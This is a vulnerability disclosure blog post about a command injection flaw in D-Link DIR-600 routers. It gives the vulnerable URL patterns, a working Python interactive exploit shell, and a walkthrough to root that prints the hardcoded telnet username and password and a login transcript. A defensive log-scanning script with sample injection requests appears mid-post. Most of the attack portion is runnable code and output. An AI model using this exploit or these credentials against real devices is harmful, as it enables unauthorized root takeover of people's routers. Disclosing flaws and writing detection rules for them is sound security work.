SPECT Research

Security and Software Development



D-Link DIR-600 Command Injection Vulnerability

In February I contacted D-Link Chile, then D-Link Latin America, but I never received an official answer to my report. After eight months, I am publishing the details of this vulnerability (I tried responsible disclosure, but D-Link didn't take my reports into account). It's a simple command injection vulnerability that requires administration credentials. For more details you can check my previous post about this issue. The hardware version is Bx and the affected firmware versions are:

  • Version 2.0 (default) (it's vulnerable to the HNAP flaw too (tested by me), which is how I managed to get admin credentials)
  • Version 2.05 (current)

The vulnerable pages are:

  • http://router_ip/tools_vct.xgi?set/runtime/switch/||command||=1
  • http://router_ip/st_log.xgi?set/runtime/syslog/||command||=1
  • http://router_ip/tools_firmware.xgi?set/runtime/sys/check_fw||command||=Bx_Default_FW_0205&date=2011.5.26.2.5.36

The exploit I use, after authenticating in the web browser, is the following:

#!/usr/bin/env python3
# coding=utf8
# csalazar at spect dot cl

import http.cookiejar
import urllib.request, urllib.error
import sys

if len(sys.argv) != 2:
    print('Usage: python3 %s router_ip' % sys.argv[0])
    sys.exit(0)

# The command is placed between the "||" markers of the vulnerable tools_vct.xgi request.
url = 'http://' + sys.argv[1] + '/tools_vct.xgi?set/runtime/switch/||%s||=1'
cj = http.cookiejar.CookieJar()
opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))

while True:
    command = input('$ ')
    try:
        r = opener.open(url % command)
    except urllib.error.HTTPError as e:
        # The router answers with an HTTP error; the command output is in the
        # response payload, followed by a fixed 136-byte trailer that is stripped.
        output = e.info()._payload
        print(output[:-136])
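As an added defensive example (not part of the original post or of D-Link's firmware), the following script flags requests to the three .xgi endpoints listed above that carry the ||command|| marker, scanning common-format web or proxy access logs; the log lines are constructed samples.

```python
#!/usr/bin/env python3
# Added example: detect DIR-600 ||command|| injection attempts in access logs.
# The log lines below are constructed samples, not captures from a real device.
import re
from urllib.parse import unquote

# Endpoints named in the post; the injected command sits between "||" markers.
VULN_ENDPOINTS = ("/tools_vct.xgi", "/st_log.xgi", "/tools_firmware.xgi")
INJECT_RE = re.compile(r"\|\|[^|]+\|\|")

# Common log format: client ident user [time] "METHOD path PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def is_injection_attempt(path):
    """True if the request path hits a known .xgi endpoint and carries a ||...|| marker.

    The path is percent-decoded first so that %7C%7C is caught as well as a raw ||.
    """
    decoded = unquote(path)
    base = decoded.split("?", 1)[0]
    return base.endswith(VULN_ENDPOINTS) and INJECT_RE.search(decoded) is not None


def scan_log(lines):
    """Return (client_ip, decoded_path) for every suspicious request in the log lines."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_injection_attempt(m.group("path")):
            hits.append((m.group("ip"), unquote(m.group("path"))))
    return hits


SAMPLE_LOG = """\
10.0.0.5 - - [12/Oct/2011:10:00:01 -0300] "GET /tools_vct.xgi?set/runtime/switch/||ls||=1 HTTP/1.1" 500 512
10.0.0.5 - - [12/Oct/2011:10:00:07 -0300] "GET /st_log.xgi?set/runtime/syslog/%7C%7Cid%7C%7C=1 HTTP/1.1" 500 340
10.0.0.9 - - [12/Oct/2011:10:01:13 -0300] "GET /tools_vct.xgi HTTP/1.1" 200 2048
10.0.0.9 - - [12/Oct/2011:10:01:20 -0300] "GET /index.htm?q=||x|| HTTP/1.1" 200 100
"""

if __name__ == "__main__":
    for ip, path in scan_log(SAMPLE_LOG.splitlines()):
        print(f"{ip} -> {path}")
```

Only the two requests against the listed endpoints are reported; a ||...|| marker on an unrelated page is left alone so the rule stays specific to this bug.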

A short video with the exploit in action is here:

Getting root access

Telnet is disabled by default, but it can be enabled. The steps are: first, find the username and password used by the telnet service, and then start the telnet daemon.

$ cat /etc/scripts/misc/telnetd.sh
#!/bin/sh
image_sign=`cat /etc/config/image_sign`
TELNETD=`rgdb -g /sys/telnetd`
if [ "$TELNETD" = "true" ]; then
    echo "Start telnetd ..." > /dev/console
    if [ -f "/usr/sbin/login" ]; then
        lf=`rgdb -i -g /runtime/layout/lanif`
        telnetd -l "/usr/sbin/login" -u Alphanetworks:$image_sign -i $lf &
    else
        telnetd &
    fi
fi

$ cat /etc/config/image_sign
wrgn23_dlwbr_dir600b

$ sh /etc/scripts/misc/telnetd.sh

After that, you can log in over Telnet with root privileges!

csalazar:~/spect/security/research/dlink$ telnet 192.168.0.1
Trying 192.168.0.1...
Connected to 192.168.0.1.
Escape character is '^]'.
login: Alphanetworks
Password: wrgn23_dlwbr_dir600b

BusyBox v1.00 (2010.11.23-03:23+0000) Built-in shell (msh)
Enter 'help' for a list of built-in commands.

Fixing the problem

No solution is provided by D-Link. The only solution is to install DD-WRT on this router.